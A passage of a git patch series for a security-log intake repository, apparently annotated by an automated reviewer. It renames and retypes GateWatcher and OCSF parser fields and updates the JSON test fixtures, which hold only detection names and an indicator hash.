z{ZnrvGu)sSoXM%EymW&p^su;5@`#TBAL*Q zeNU`>%Gw6(woxxbI`JeiQTw?sPf1spK1PtS;l#42*T#?-h3VzxuBTETd@|TuqGgb@ zIOO_0@Way@m6tYJW0eLkc>RNNQ$m@v;8BL^#Cp)mU*htB29lvnF>gRRp3LgVR-d7H zb-YBVg_b0&JD<6{5MPF};W3$}WTn#NPY5cB@sTWKG2s}*8FRsW$-ju`dB z!P0cpw-3N_^`vqBV{?vDSU4TwH;q8+`y#H?%VLB#ca{f3r7j=uTbXv=x$M-WZ8trW z@pRMU?IgM-%Jo)#ooSuxH%)&QW@jWOff{!=C0H76c9w9T12Es>4wx81Eu!d$11@}% zAOd;(+?L1|YGD{@K3bHpDq;Y2NYCR5YouYYVzQskllqupK42Tlte-R|r7g5S3Mckps6BEy~T@tM_cJ%Sv)Nd=Cxv9#wo z14*9n)|G{h{(I-DMybuvT4TLR0`kqbU)_VxH{St6Vn^exdYFmGzV!TDwc^> zFniaNPqSKGA@o3-vIgv{+mAmC6 
z%^R#9^V1>s{yAm_Yv+}r>*Fl>f~4m5kPMGNUhIcqQ2zUipi^%dot7j4MiZ^L!7N*@ zzsQ+$ipH1O^O}!rLql;0%hwe4o4hHWs}m8CQgCScbKandKC{eb3hVUCgPLcUax}?e z{%^qX78$yc@Vk-#jEI)L=`?S3b;U2Tv`FwzPj^YRIhux(CA=L2|K_4lGMNF6XMDS? zuo4TQueFh5wN9E!*AeX-0bm2~jHP2v1au>-W0U&qT7rH(pFuySTES8qTxnvzdezXe zy1nZ+Jeq}uOt77nd9~0oDwagSW2Us7Ppy6JM=Pbdz8r*XiFcLJ9MslsWbaM|+{!U4ljZ&?vbT`Z!g>jQ(>1@v&-1VBjI2g~_5A5PvSN}wfQDKYH{mEJD z>P}A_1f~|pV&P6`wa=jjqb;FM_aG?&xa!2BLK2!O!#vOwAf>YKxQCo#M!4QZa+T^78gbjhtJZj z(`yk9d<{4X(_Pu)a%8pL*6Yto7)G{wm)zRBIEBatkA(NJFV&u#?|1*JrU+0~_#95#Q>cZK;eWN3lI7jOX<_?`jIaSH3;L z>{wHzQd3Gim-GTQj;sA*zmYB;DQR0Qyt(InK5*Tr%VhWw!d?ULMe{+a2tOOtraW~V5g#8 z`gHxVZO|}x=j`+G>Q^;)*+8LW7^gzHF~L3_g!tS(Br0W*!b^dW{Fbj=BmHSH@$B=G z6)DfmD(cWJWCn5L_b4K0DD`Qk6Wbd~l=;1%W~ImF?Cnm`w-4&sm0F^=)M-VKNKILG zRE^qNu%zDNB*?ngMj`%v{Qd$Ju=V6bRa>XbyEb~oI3qcr3r}HY%d*?8ywZqpUwy3k zbe&!_1qG^5iDp>``EdzH~OKa$bP^wV`@Mz+h#ueU?|UPE~5D${r^ffEf} zg(i=)10a*iMNoIM=c|X}St0a8j*wwc<;&iv0%$1SNa`tsxrk7PuEgCzWS$Wif8Z1a z;^U@%_qNH#P}#FgEok261w;366%tQ>YyHHWP;gl&$g}CyY22PlJ>akZpp7G4#K4L_ zz7jN9+vP@wYJH%AnEn2>_@QSOKsM)1w>SCvyO)E3!LP75;i(b71OY#-Y-HWIm9;4= z)>?DgA4*I!Mg`nscP)-uVisJ};?73pssU z!*9+>3=4b8>~zsTbbZ>#Iq?j{mFZvdu~b~a^s-5#-#>z$)c6sMh}_A_F9-?Gx#v0XK$1oq89{$P zfW9&qd$=T-J(H($8w+?qhFDc9SsL^3FeAT`f;{VxGh@~tyY#0T1`JNW=dy)0e3qeA z!jxRBu8Iv+3}}4@ER zrW97uVz2r_%H5tih&pDWoEXX9KOmn`T50uEE9yZDqajHtn(nsDsaEX{AX2y=_-=ZJ z_{K;HyqQR;_(NLr%Q#5iQ=dhd+}z`|d&Csqsnxly#+J8~(h%_Yyt!)c5$<6I>}C0h z;^etw&}6HZ;i0UnecpqLMVygtzJF)<=-P5^wx9*&wM|k!kNv=-V~*1!iZ#0Uv|e9h zR~_o}n#wubODeVAMy1wG*uM8uzp>1|IB5?Iwn}2q7~`d}iF7SP5LtrY*L?kI^4giV zi|L?Q^H^B@wNV@RkUk}9dSJ)$t9}8x{YkB5!2TvKlwB<$ZKgZ`_)CuCWWGXDc4(&2 zuxAw&H>9!jsS7B4t_j&T5-GFoAQ_TJz=M{p{UR)({Uo}gb4*u8P_wW==F7%bB@b1x zNG{Vg=_W#9EfIgrwU59L%4*C=nz4LdTF<^=!V5$6)-?~FC(^{R=_?_$fq#%uvxr6I zx8ULFmcjqZd)dvcXmYPM;RU(e3R11nr(6*~Pc$u%B5Jax^L4 ziC>Ff`?m}=5B{!7)aR9e1o3#pC?erYnp%aCSDu9uDGd3_(XIZ>oD-cpZ|(HwKid^7NW^Q2VkaB-CQosI z{I*mwGcf5A?L91DdkkZrGg0=bQG1IJ0jw>R%qnx&zPVh_7Cy>i$NNMu&ggz+=yTzjtjGOX#-;wyM~>pS)d`gCClrdtqU#qB 
zr2yG;Mqs`t==?WAmXFO78Srw|``k|0#Irk#P^SycqN^tvBn;{e(->P;`31J{dbR9*i~@Y$c9qBvLF{GYu0d#ILvu29+>Vo{Q|O#2_==DIxQ%p)5mhV(B^O7t zx?q#ZUR|rbm3U6dsy49Nss^4ne_=VFb<;6N$lIOp>sWiM%>1>XDy<}u3Mb>mLV)tNegGOo+sgS04EO%@YBFi0eFTF})uQ5{+@xcxCo8-Q8W=3lxqlV-WDf6(EiR%#vZ&qvKXUO2l@-E>z^+xcyzq zu;$hVUcF_wEa)!6bWDwN zx{*X92?&E*1ETpe;xcJ(Wo3Nbnn6S{6#+8R4$lJ73;RHUPzD7>2q*E_G-QH!EK`a$ z#+GGF?E*n9Gkp#{+E21#eej>c5A+0l9hGl%DXSMQUO}t-nivQGL`;K7`z!=;@g&V(?}y(Nn!|-+Vu4TCD+Q}RJx`xTN49VF#EbflNmE4>vQDt=c}|q=j;HHa gYRXXaw(c-_-TyS;4D1ZT|Coy)FQXz|D`^(`KbLQIApigX diff --git a/1Password/_meta/manifest.yml b/1Password/_meta/manifest.yml index 7a2995595..9c3fde957 100644 --- a/1Password/_meta/manifest.yml +++ b/1Password/_meta/manifest.yml @@ -1,5 +1,5 @@ uuid: c938db6f-be6c-425c-8ea2-eab1ff63bc83 name: 1Password -slug: "1password" +slug: one-password description: >- 1Password is a password management company that provides secure solutions for storing and managing passwords and sensitive information. Its services are designed for both individuals and teams to ensure online security and simplify credential management. From 54ff2173c325461cdcc2be6e4ef9a8e0b68b6ad7 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 17 Sep 2024 14:14:29 +0200 Subject: [PATCH 042/317] fix gatewatcher.malcore.code to a number type --- GateWatcher/aioniq/_meta/fields.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 60ddda7ad..d1263225c 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -21,7 +21,7 @@ gatewatcher.gcenter: gatewatcher.malcore.code: description: Return code of the malcore analysis name: gatewatcher.malcore.code - type: keyword + type: number gatewatcher.malcore.detail_threat_found: description: Type of the detected threat From 7e5ae69dfde2978b9ac465f07b32034e05ae89b5 Mon Sep 17 00:00:00 2001 
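Review bot: The switch of `gatewatcher.malcore.code` to `type: number` is not paired with any conversion in the parser, which this patch does not touch, so whether the ingested value is numeric depends entirely on what GateWatcher emits. If the return code ever arrives as a string, or as a non-numeric token on an error path, the event may be rejected or the field dropped at ingestion where it previously landed under keyword. Worth checking a malcore sample and, if needed, casting the value in the corresponding parser.yml mapping (`| int`). Retyping an already-deployed field can also conflict with previously indexed documents; if that applies to this intake, a note about reindexing or a fresh field name would be safer.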
From: Clement Lyonnet Date: Tue, 17 Sep 2024 14:25:21 +0200 Subject: [PATCH 043/317] fix for gatewatcher.tftp.* fields to comfort structured ones as well as ECS format --- GateWatcher/aioniq/_meta/fields.yml | 17 +++++++++++++---- GateWatcher/aioniq/ingest/parser.yml | 4 +++- 2 files changed, 16 insertions(+), 5 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index d1263225c..5bdc4fb3e 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -373,10 +373,19 @@ gatewatcher.targeted_sectors: name: gatewatcher.targeted_sectors type: text -gatewatcher.tftp: - description: This field represents the tftp field in a network metadata (used in - legacy format log) - name: gatewatcher.tftp +gatewatcher.tftp.file: + description: tftp file field + name: gatewatcher.tftp.file + type: text + +gatewatcher.tftp.mode: + description: tftp mode field + name: gatewatcher.tftp.mode + type: text + +gatewatcher.tftp.packet: + description: tftp packet field + name: gatewatcher.tftp.packet type: text gatewatcher.threat_actor: diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 7679c02a1..162cc5093 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -156,7 +156,9 @@ stages: gatewatcher.mqtt: '{{json_load.message.mqtt}}' gatewatcher.smtp: '{{json_load.message.smtp}}' gatewatcher.snmp: '{{json_load.message.snmp}}' - gatewatcher.tftp: '{{json_load.message.tftp}}' + gatewatcher.tftp.file: '{{json_load.message.tftp.file}}' + gatewatcher.tftp.mode: '{{json_load.message.tftp.mode}}' + gatewatcher.tftp.packet: '{{json_load.message.tftp.packet}}' destination.bytes: '{{json_load.message.flow.bytes_toclient}}' dns.question.name: '{{json_load.message.dns.rrname}}' dns.question.type: '{{json_load.message.dns.rrtype}}' From b3c2ef63bae75547ff1841ac93349ef38c54ddf1 Mon Sep 17 00:00:00 2001 
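Review bot: The three new `gatewatcher.tftp.*` definitions carry placeholder descriptions that restate the name (`description: tftp file field`); since these strings are what a user sees in the field catalogue, say what the value holds, e.g. `description: File name carried in the TFTP request` for `gatewatcher.tftp.file`, and the equivalent for `mode` and `packet`. `type: text` is the analysed free-text type; if `mode` is the TFTP transfer mode it is a small fixed vocabulary (RFC 1350 defines `netascii`, `octet`, `mail`), and `packet` presumably an opcode name, so `keyword` would keep both filterable and aggregatable — confirm against sample logs before changing.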
From: Clement Lyonnet Date: Tue, 17 Sep 2024 14:40:20 +0200 Subject: [PATCH 044/317] fix for gatewatcher.email.to & from, removed from fields --- GateWatcher/aioniq_ecs/_meta/fields.yml | 10 ---------- GateWatcher/aioniq_ecs/ingest/parser.yml | 4 ++-- 2 files changed, 2 insertions(+), 12 deletions(-) diff --git a/GateWatcher/aioniq_ecs/_meta/fields.yml b/GateWatcher/aioniq_ecs/_meta/fields.yml index 733dd5550..4c47ec94e 100644 --- a/GateWatcher/aioniq_ecs/_meta/fields.yml +++ b/GateWatcher/aioniq_ecs/_meta/fields.yml @@ -203,11 +203,6 @@ gatewatcher.email.body_md5: name: gatewatcher.email.body_md5 type: text -gatewatcher.email.from: - description: email from field - name: gatewatcher.email.from - type: text - gatewatcher.email.status: description: email status field name: gatewatcher.email.status @@ -218,11 +213,6 @@ gatewatcher.email.subject_md5: name: gatewatcher.email.subject_md5 type: text -gatewatcher.email.to: - description: email to field - name: gatewatcher.email.to - type: text - gatewatcher.event.created: description: Event created field name: gatewatcher.event.created diff --git a/GateWatcher/aioniq_ecs/ingest/parser.yml b/GateWatcher/aioniq_ecs/ingest/parser.yml index 8f53ec153..3fd4eea43 100644 --- a/GateWatcher/aioniq_ecs/ingest/parser.yml +++ b/GateWatcher/aioniq_ecs/ingest/parser.yml @@ -376,8 +376,8 @@ stages: email.subject: '{{json_load.message.email.subject}}' email.message_id: '{{json_load.message.email.message_id}}' email.attachments: '{{json_load.message.email.attachments}}' - gatewatcher.email.to: '{{json_load.message.email.to}}' - gatewatcher.email.from: '{{json_load.message.email.from}}' + email.to.address: '{{json_load.message.email.to}}' + email.from.address: '{{json_load.message.email.from}}' gatewatcher.email.status: '{{json_load.message.email.status}}' gatewatcher.email.body_md5: '{{json_load.message.email.body_md5}}' gatewatcher.email.subject_md5: '{{json_load.message.email.subject_md5}}' 
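Review bot: `email.to.address` and `email.from.address` are array fields in ECS, but `'{{json_load.message.email.to}}'` renders whatever the source holds as one string; if GateWatcher emits `to` as a list, the field receives its Python repr (constructed example: `['a@x', 'b@y']`) instead of a list of addresses. If the source is always a list, emit it as one — for example `email.to.address: '{{json_load.message.email.to | tojson}}'` — and if it can be either, normalise it in the template before assigning. The enclosing `set` action starts and ends outside the hunk.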
From 12624b8f6e31739dd5f7e631b5d602e4cf81199d Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 17 Sep 2024 14:48:08 +0200 Subject: [PATCH 045/317] suggested changes applied for syslog fields --- GateWatcher/aioniq_ecs/_meta/fields.yml | 20 ++++++++++++++++++++ GateWatcher/aioniq_ecs/ingest/parser.yml | 12 ++++++------ 2 files changed, 26 insertions(+), 6 deletions(-) diff --git a/GateWatcher/aioniq_ecs/_meta/fields.yml b/GateWatcher/aioniq_ecs/_meta/fields.yml index 4c47ec94e..7e7dc42d8 100644 --- a/GateWatcher/aioniq_ecs/_meta/fields.yml +++ b/GateWatcher/aioniq_ecs/_meta/fields.yml @@ -1243,6 +1243,26 @@ gatewatcher.syslog.message: name: gatewatcher.syslog.message type: text +gatewatcher.syslog.priority: + description: syslog priority field + name: gatewatcher.syslog.priority + type: text + +gatewatcher.syslog.facility.code: + description: syslog facility code field + name: gatewatcher.syslog.facility.code + type: text + +gatewatcher.syslog.facility.name: + description: syslog facility name field + name: gatewatcher.syslog.facility.name + type: text + +gatewatcher.syslog.severity.name: + description: syslog severity name field + name: gatewatcher.syslog.severity.name + type: text + gatewatcher.tftp.file: description: tftp file field name: gatewatcher.tftp.file diff --git a/GateWatcher/aioniq_ecs/ingest/parser.yml b/GateWatcher/aioniq_ecs/ingest/parser.yml index 3fd4eea43..96c44306c 100644 --- a/GateWatcher/aioniq_ecs/ingest/parser.yml +++ b/GateWatcher/aioniq_ecs/ingest/parser.yml 
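Review bot: `gatewatcher.syslog.priority` and `gatewatcher.syslog.facility.code` look like numeric syslog codes yet are declared `type: text`, the analysed free-text type, which is neither range-filterable nor aggregatable; `type: long` (or `keyword` if a non-numeric value can appear) fits better, and `facility.name` / `severity.name` are fixed vocabularies suited to `keyword`. The descriptions again restate the name (`syslog priority field`); if `priority` is the RFC 5424 PRI value, `description: Syslog PRI value (facility * 8 + severity) of the original message` and similar one-liners for the other three would cost little.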
@@ -650,12 +650,12 @@ stages: syslog: actions: - set: - log.syslog.appname: '{{json_load.message.log.syslog.appname}}' - log.syslog.priority: '{{json_load.message.log.syslog.priority}}' - log.syslog.facility.code: '{{json_load.message.log.syslog.facility.code}}' - log.syslog.facility.name: '{{json_load.message.log.syslog.facility.name}}' - log.syslog.severity.code: '{{json_load.message.log.syslog.severity.code}}' - log.syslog.severity.name: '{{json_load.message.log.syslog.severity.name}}' + network.application: '{{json_load.message.log.syslog.appname}}' + gatewatcher.syslog.priority: '{{json_load.message.log.syslog.priority}}' + gatewatcher.syslog.facility.code: '{{json_load.message.log.syslog.facility.code}}' + gatewatcher.syslog.facility.name: '{{json_load.message.log.syslog.facility.name}}' + event.severity: '{{json_load.message.log.syslog.severity.code}}' + gatewatcher.syslog.severity.name: '{{json_load.message.log.syslog.severity.name}}' gatewatcher.syslog.message: '{{json_load.message.syslog.message}}' filter: '' name: set From fd166f6ff6093d640c84b156384bb07f7c5eee96 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 17 Sep 2024 14:54:46 +0200 Subject: [PATCH 046/317] suggested changes applied for gatewatcher.ioc.* field --- GateWatcher/aioniq_ecs/_meta/fields.yml | 15 --------------- GateWatcher/aioniq_ecs/ingest/parser.yml | 6 +++--- 2 files changed, 3 insertions(+), 18 deletions(-) diff --git a/GateWatcher/aioniq_ecs/_meta/fields.yml b/GateWatcher/aioniq_ecs/_meta/fields.yml index 7e7dc42d8..a036865f3 100644 --- a/GateWatcher/aioniq_ecs/_meta/fields.yml +++ b/GateWatcher/aioniq_ecs/_meta/fields.yml 
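Review bot: `network.application` is not a natural home for the syslog appname: in ECS that field names the application-layer protocol or service observed on the network, whereas the program that wrote a syslog line belongs in `log.syslog.appname` — the very field this hunk removes — or `process.name`. If `log.syslog.*` was dropped because the target schema does not list it, `process.name: '{{json_load.message.log.syslog.appname}}'` preserves ECS meaning, with a vendor copy under a `gatewatcher.syslog.appname` key alongside the other `gatewatcher.syslog.*` fields added in fields.yml. `event.severity` is a `long` in ECS, so check that `severity.code` reaches it as a number rather than as the rendered template string.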
@@ -533,16 +533,6 @@ gatewatcher.ioc.threat_actor: name: gatewatcher.ioc.threat_actor type: text -gatewatcher.ioc.tlp: - description: ioc tlp field - name: gatewatcher.ioc.tlp - type: text - -gatewatcher.ioc.type: - description: ioc type field - name: gatewatcher.ioc.type - type: text - gatewatcher.ioc.updated_date: description: ioc updated_date field name: gatewatcher.ioc.updated_date @@ -553,11 +543,6 @@ gatewatcher.ioc.usage_mode: name: gatewatcher.ioc.usage_mode type: text -gatewatcher.ioc.value: - description: ioc value field - name: gatewatcher.ioc.value - type: text - gatewatcher.krb5.cname: description: krb5 cname field name: gatewatcher.krb5.cname diff --git a/GateWatcher/aioniq_ecs/ingest/parser.yml b/GateWatcher/aioniq_ecs/ingest/parser.yml index 96c44306c..42afcb85b 100644 --- a/GateWatcher/aioniq_ecs/ingest/parser.yml +++ b/GateWatcher/aioniq_ecs/ingest/parser.yml @@ -738,10 +738,10 @@ stages: ioc: actions: - set: - gatewatcher.ioc.tlp: '{{json_load.message.ioc.tlp}}' + threat.indicator.marking.tlp: '{{json_load.message.ioc.tlp}}' gatewatcher.ioc.tags: '{{json_load.message.ioc.tags}}' - gatewatcher.ioc.type: '{{json_load.message.ioc.type}}' - gatewatcher.ioc.value: '{{json_load.message.ioc.value}}' + threat.indicator.type: '{{json_load.message.ioc.type}}' + threat.indicator.name: '{{json_load.message.ioc.value}}' gatewatcher.ioc.case_id: '{{json_load.message.ioc.case_id}}' gatewatcher.ioc.families: '{{json_load.message.ioc.families}}' gatewatcher.ioc.campaigns: '{{json_load.message.ioc.campaigns}}' From 6565542fe622c3172c2d2b7b3a8543da26b53c09 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 17 Sep 2024 16:20:26 +0200 Subject: [PATCH 047/317] updated tests --- GateWatcher/aioniq/tests/malcore.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json index 9c3c5ea11..996eea0b8 100644 --- a/GateWatcher/aioniq/tests/malcore.json 
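Review bot: `threat.indicator.type` is mapped straight from `json_load.message.ioc.type`, but the ECS field expects the STIX observable vocabulary (`file`, `ipv4-addr`, `domain-name`, `url`, …) while the ioc.json fixture updated in the next commit carries `"SHA256"`, which is a hash algorithm, not an indicator type. A SHA-256 digest placed in `threat.indicator.name` would likewise fit `threat.indicator.file.hash.sha256` better, and ECS documents `threat.indicator.marking.tlp` with upper-case values (`WHITE`, `GREEN`, `AMBER`, `RED`) whereas the source value is `green`. Consider dispatching on `ioc.type` — e.g. `threat.indicator.file.hash.sha256: '{{json_load.message.ioc.value}}'` guarded by `filter: "{{json_load.message.ioc.type == 'SHA256'}}"` — applying `| upper` to the TLP value, and keeping the raw type in a vendor field so nothing is lost.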
+++ b/GateWatcher/aioniq/tests/malcore.json
@@ -42,7 +42,7 @@
 "gcap": "gcap-xxxxxxxx.domain.local",
 "gcenter": "gcenter-xxxxxxxx.domain.local",
 "malcore": {
- "code": "1",
+ "code": 1,
 "detail_threat_found": "Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF"
 },
 "reporting_token": "No GBOX",
From f0cc4fdb754960357f2baa82f0f493908fd43e7d Mon Sep 17 00:00:00 2001
From: Clement Lyonnet
Date: Tue, 17 Sep 2024 16:23:38 +0200
Subject: [PATCH 048/317] updated tests
---
 GateWatcher/aioniq_ecs/tests/ioc.json | 14 ++++++++++----
 1 file changed, 10 insertions(+), 4 deletions(-)
diff --git a/GateWatcher/aioniq_ecs/tests/ioc.json b/GateWatcher/aioniq_ecs/tests/ioc.json
index 190c98114..ffb6a02cd 100644
--- a/GateWatcher/aioniq_ecs/tests/ioc.json
+++ b/GateWatcher/aioniq_ecs/tests/ioc.json
@@ -78,11 +78,8 @@
 "threat_actor": [
 "BlackTech"
 ],
- "tlp": "green",
- "type": "SHA256",
 "updated_date": "2023-04-07T04:10:34Z",
- "usage_mode": "detection",
- "value": "2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4"
+ "usage_mode": "detection"
 },
 "observer": {
 "log_format_version": "1.0.0"
@@ -91,6 +88,15 @@
 "observer": {
 "product": "lastinfosec",
 "vendor": "gatewatcher"
+ },
+ "threat": {
+ "indicator": {
+ "marking": {
+ "tlp": "green"
+ },
+ "name": "2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4",
+ "type": "SHA256"
+ }
 }
 }
 }
\ No newline at end of file
From ad7b91e63c538d987ed3c9dc6ed36269241d7e4e Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Tue, 17 Sep 2024 18:32:36 +0200
Subject: [PATCH 049/317] fix(OCSF): prefix process users
---
 OCSF/ocsf/_meta/fields.yml | 24 ++++++++++++------------
 OCSF/ocsf/ingest/parser.yml | 24 ++++++++++++------------
 2 files changed, 24 insertions(+), 24 deletions(-)
diff --git a/OCSF/ocsf/_meta/fields.yml b/OCSF/ocsf/_meta/fields.yml index 153d909a6..be3385077 100644 --- a/OCSF/ocsf/_meta/fields.yml +++ b/OCSF/ocsf/_meta/fields.yml @@ -40,19 +40,19 @@ process.group.name: name: process.group.name type: keyword -process.parent.user.domain: +ocsf.process.parent.user.domain: description: '' - name: process.parent.user.domain + name: ocsf.process.parent.user.domain type: keyword -process.parent.user.email: +ocsf.process.parent.user.email: description: '' - name: process.parent.user.email + name: ocsf.process.parent.user.email type: keyword -process.parent.user.full_name: +ocsf.process.parent.user.full_name: description: '' - name: process.parent.user.full_name + name: ocsf.process.parent.user.full_name type: keyword process.parent.user.group.id: @@ -65,19 +65,19 @@ process.parent.user.group.name: name: process.parent.user.group.name type: keyword -process.user.domain: +ocsf.process.user.domain: description: '' - name: process.user.domain + name: ocsf.process.user.domain type: keyword -process.user.email: +ocsf.process.user.email: description: '' - name: process.user.email + name: ocsf.process.user.email type: keyword -process.user.full_name: +ocsf.process.user.full_name: description: '' - name: process.user.full_name + name: ocsf.process.user.full_name type: keyword process.user.group.id: diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml index 0c57d8113..8670753fd 100644 --- a/OCSF/ocsf/ingest/parser.yml +++ b/OCSF/ocsf/ingest/parser.yml 
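Review bot: The six renamed definitions keep `description: ''`, so the move under the `ocsf.` prefix is a good moment to fill them in — e.g. `description: Domain of the account the process runs as, from the OCSF process.user object` for `ocsf.process.user.domain`, with the equivalent one-liners for `email`, `full_name` and the `parent.` variants. Empty descriptions are accepted by the linter but leave the field catalogue silent on what the values mean.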
@@ -321,9 +321,9 @@ stages:
 process.start: "{{ parse_event.message.actor.process.created_time | to_rfc3339 }}"
 process.thread.id: "{{ parse_event.message.actor.process.tid }}"
 process.entity_id: "{{ parse_event.message.actor.process.uid }}"
- process.user.domain: "{{ parse_event.message.actor.process.user.domain }}"
- process.user.email: "{{ parse_event.message.actor.process.user.email_addr }}"
- process.user.full_name: "{{ parse_event.message.actor.process.user.full_name }}"
+ ocsf.process.user.domain: "{{ parse_event.message.actor.process.user.domain }}"
+ ocsf.process.user.email: "{{ parse_event.message.actor.process.user.email_addr }}"
+ ocsf.process.user.full_name: "{{ parse_event.message.actor.process.user.full_name }}"
 - set:
 process.user.id:
 - "{{ parse_event.message.actor.process.euid }}"
@@ -380,9 +380,9 @@ stages:
 process.parent.start: "{{ parse_event.message.actor.process.parent_process.created_time | to_rfc3339 }}"
 process.parent.thread.id: "{{ parse_event.message.actor.process.parent_process.tid }}"
 process.parent.entity_id: "{{ parse_event.message.actor.process.parent_process.uid }}"
- process.parent.user.domain: "{{ parse_event.message.actor.process.parent_process.user.domain }}"
- process.parent.user.email: "{{ parse_event.message.actor.process.parent_process.user.email_addr }}"
- process.parent.user.full_name: "{{ parse_event.message.actor.process.parent_process.user.full_name }}"
+ ocsf.process.parent.user.domain: "{{ parse_event.message.actor.process.parent_process.user.domain }}"
+ ocsf.process.parent.user.email: "{{ parse_event.message.actor.process.parent_process.user.email_addr }}"
+ ocsf.process.parent.user.full_name: "{{ parse_event.message.actor.process.parent_process.user.full_name }}"
 - set:
 process.parent.user.id:
 - "{{ parse_event.message.actor.process.parent_process.euid }}"
@@ -616,9 +616,9 @@ stages:
 process.start: "{{ parse_event.message.process.created_time | to_rfc3339 }}"
 process.thread.id: "{{ parse_event.message.process.tid }}"
 process.entity_id: "{{ parse_event.message.process.uid }}"
- process.user.domain: "{{ parse_event.message.process.user.domain }}"
- process.user.email: "{{ parse_event.message.process.user.email_addr }}"
- process.user.full_name: "{{ parse_event.message.process.user.full_name }}"
+ ocsf.process.user.domain: "{{ parse_event.message.process.user.domain }}"
+ ocsf.process.user.email: "{{ parse_event.message.process.user.email_addr }}"
+ ocsf.process.user.full_name: "{{ parse_event.message.process.user.full_name }}"
 - set:
 process.user.id:
 - "{{ parse_event.message.process.euid }}"
@@ -652,9 +652,9 @@ stages:
 process.parent.start: "{{ parse_event.message.process.parent_process.created_time | to_rfc3339 }}"
 process.parent.thread.id: "{{ parse_event.message.process.parent_process.tid }}"
 process.parent.entity_id: "{{ parse_event.message.process.parent_process.uid }}"
- process.parent.user.domain: "{{ parse_event.message.process.parent_process.user.domain }}"
- process.parent.user.email: "{{ parse_event.message.process.parent_process.user.email_addr }}"
- process.parent.user.full_name: "{{ parse_event.message.process.parent_process.user.full_name }}"
+ ocsf.process.parent.user.domain: "{{ parse_event.message.process.parent_process.user.domain }}"
+ ocsf.process.parent.user.email: "{{ parse_event.message.process.parent_process.user.email_addr }}"
+ ocsf.process.parent.user.full_name: "{{ parse_event.message.process.parent_process.user.full_name }}"
 - set:
 process.parent.user.id:
 - "{{ parse_event.message.process.parent_process.euid }}"
From 90e897ac7589045920c1482ef6fcd87d2b5abf0d Mon Sep 17 00:00:00 2001
From: Sebastien Quioc Date: Tue, 17 Sep 2024 18:35:38 +0200 Subject: [PATCH 050/317] refactor(OCSF): change the way to represent the group associated to process --- OCSF/ocsf/_meta/fields.yml | 34 ++---- OCSF/ocsf/ingest/parser.yml | 121 +++++++++++++------ OCSF/ocsf/tests/test_process_activity_1.json | 4 - 3 files changed, 93 insertions(+), 66 deletions(-) diff --git a/OCSF/ocsf/_meta/fields.yml b/OCSF/ocsf/_meta/fields.yml index be3385077..532291fd9 100644 --- a/OCSF/ocsf/_meta/fields.yml +++ b/OCSF/ocsf/_meta/fields.yml @@ -30,15 +30,15 @@ ocsf.vulnerabilities: name: ocsf.vulnerabilities type: array -process.group.id: +ocsf.process.group: description: '' - name: process.group.id - type: keyword + name: ocsf.process.group + type: dict -process.group.name: +ocsf.process.parent.group: description: '' - name: process.group.name - type: keyword + name: ocsf.process.parent.group + type: dict ocsf.process.parent.user.domain: description: '' @@ -55,15 +55,10 @@ ocsf.process.parent.user.full_name: name: ocsf.process.parent.user.full_name type: keyword -process.parent.user.group.id: - description: '' - name: process.parent.user.group.id - type: keyword - -process.parent.user.group.name: +ocsf.process.parent.user.groups: description: '' - name: process.parent.user.group.name - type: keyword + name: ocsf.process.parent.user.groups + type: array ocsf.process.user.domain: description: '' @@ -80,12 +75,7 @@ ocsf.process.user.full_name: name: ocsf.process.user.full_name type: keyword -process.user.group.id: - description: '' - name: process.user.group.id - type: keyword - -process.user.group.name: +ocsf.process.user.groups: description: '' - name: process.user.group.name - type: keyword + name: ocsf.process.user.groups + type: array diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml index 8670753fd..7284638f6 100644 --- a/OCSF/ocsf/ingest/parser.yml +++ b/OCSF/ocsf/ingest/parser.yml 
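Review bot: `ocsf.process.group` and `ocsf.process.parent.group` are declared `type: dict`, while the nested-object definition further down this series (the HarfangLab `action.properties` entry) uses `type: object`; if the schema accepts only one spelling the parser tests will not catch it, because they validate emitted events rather than field declarations — confirm which one is valid. All six new definitions also keep `description: ''`; one line each, e.g. `description: Effective group (id and name) the process runs under` for `ocsf.process.group` and `description: Groups of the account the process runs as (uid and name per entry)` for `ocsf.process.user.groups`, would make the array/dict shapes discoverable.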
